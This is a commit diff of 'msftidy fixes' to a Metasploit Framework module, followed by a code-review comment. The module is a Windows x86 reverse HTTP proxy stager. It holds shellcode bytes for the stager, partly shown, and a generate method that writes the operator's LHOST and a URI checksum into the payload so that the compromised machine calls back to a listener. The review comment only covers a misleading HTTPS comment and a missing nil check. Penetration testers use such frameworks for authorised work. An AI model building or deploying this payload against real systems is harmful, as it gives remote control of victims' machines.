msftidy fixes
parent
99cd36c036
commit
91b4a59fc7
|
@ -1,42 +1,39 @@
|
||||||
##
|
##
|
||||||
# This file is part of the Metasploit Framework and may be subject to
|
# This module requires Metasploit: http://metasploit.com/download
|
||||||
# redistribution and commercial restrictions. Please see the Metasploit
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
# web site for more information on licensing and terms of use.
|
|
||||||
# http://metasploit.com/
|
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
require 'msf/core/handler/reverse_http'
|
require 'msf/core/handler/reverse_http'
|
||||||
|
|
||||||
|
|
||||||
module Metasploit3
|
module Metasploit3
|
||||||
|
|
||||||
include Msf::Payload::Stager
|
include Msf::Payload::Stager
|
||||||
include Msf::Payload::Windows
|
include Msf::Payload::Windows
|
||||||
|
|
||||||
def self.handler_type_alias
|
def self.handler_type_alias
|
||||||
"reverse_http_proxy_pstore"
|
"reverse_http_proxy_pstore"
|
||||||
end
|
end
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(merge_info(info,
|
super(merge_info(info,
|
||||||
'Name' => 'Reverse HTTP Stager Proxy',
|
'Name' => 'Reverse HTTP Stager Proxy',
|
||||||
'Description' => 'Tunnel communication over HTTP',
|
'Description' => 'Tunnel communication over HTTP',
|
||||||
'Author' => 'hdm',
|
'Author' => 'hdm',
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Arch' => ARCH_X86,
|
'Arch' => ARCH_X86,
|
||||||
'Handler' => Msf::Handler::ReverseHttp,
|
'Handler' => Msf::Handler::ReverseHttp,
|
||||||
'Convention' => 'sockedi http',
|
'Convention' => 'sockedi http',
|
||||||
'Stager' =>
|
'Stager' =>
|
||||||
{
|
{
|
||||||
'Offsets' =>
|
'Offsets' =>
|
||||||
{
|
{
|
||||||
'EXITFUNC' => [ 579, 'V' ],
|
'EXITFUNC' => [ 579, 'V' ],
|
||||||
'LPORT' => [ 499, 'v' ], # Not a typo, really little endian
|
'LPORT' => [ 499, 'v' ], # Not a typo, really little endian
|
||||||
},
|
},
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
# Built on Thu Mar 6 02:37:12 2014
|
# Built on Thu Mar 6 02:37:12 2014
|
||||||
|
|
||||||
# Name: stager_reverse_http_proxy_pstore
|
# Name: stager_reverse_http_proxy_pstore
|
||||||
|
@ -84,31 +81,31 @@ module Metasploit3
|
||||||
"\x89\xE7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF" +
|
"\x89\xE7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF" +
|
||||||
"\xD5\x85\xC0\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\x5E" +
|
"\xD5\x85\xC0\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\x5E" +
|
||||||
"\x5E\x5E\x59\x5A\xE8\x60\xFF\xFF\xFF"}
|
"\x5E\x5E\x59\x5A\xE8\x60\xFF\xFF\xFF"}
|
||||||
))
|
))
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Do not transmit the stage over the connection. We handle this via HTTPS
|
# Do not transmit the stage over the connection. We handle this via HTTPS
|
||||||
#
|
#
|
||||||
def stage_over_connection?
|
def stage_over_connection?
|
||||||
false
|
false
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Generate the first stage
|
# Generate the first stage
|
||||||
#
|
#
|
||||||
def generate
|
def generate
|
||||||
p = super
|
p = super
|
||||||
i = p.index("/12345\x00")
|
i = p.index("/12345\x00")
|
||||||
u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW) + "\x00"
|
u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW) + "\x00"
|
||||||
p[i, u.length] = u
|
p[i, u.length] = u
|
||||||
p + datastore['LHOST'].to_s + "\x00"
|
p + datastore['LHOST'].to_s + "\x00"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Always wait at least 20 seconds for this payload (due to staging delays)
|
# Always wait at least 20 seconds for this payload (due to staging delays)
|
||||||
#
|
#
|
||||||
def wfs_delay
|
def wfs_delay
|
||||||
20
|
20
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
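Review bot: The comment above `stage_over_connection?` says the stage is handled "via HTTPS", but the module declares `'Handler' => Msf::Handler::ReverseHttp` and describes itself as 'Tunnel communication over HTTP', so the comment misstates the transport; since this is a tidy pass it could read `# Do not transmit the stage over the connection. We handle this via HTTP`. In `generate`, `p.index("/12345\x00")` returns nil when the placeholder is absent from the payload blob (most of which lies between the two hunks and is not shown), and `p[i, u.length] = u` then fails with an unhelpful TypeError; a guard such as `raise ArgumentError, 'URI placeholder not found in stager' if i.nil?` would make the failure explicit. The splice also appears to assume the string built from `generate_uri_checksum` is no longer than the 7-byte placeholder, which cannot be confirmed from the visible lines and would be worth a short comment or a length check.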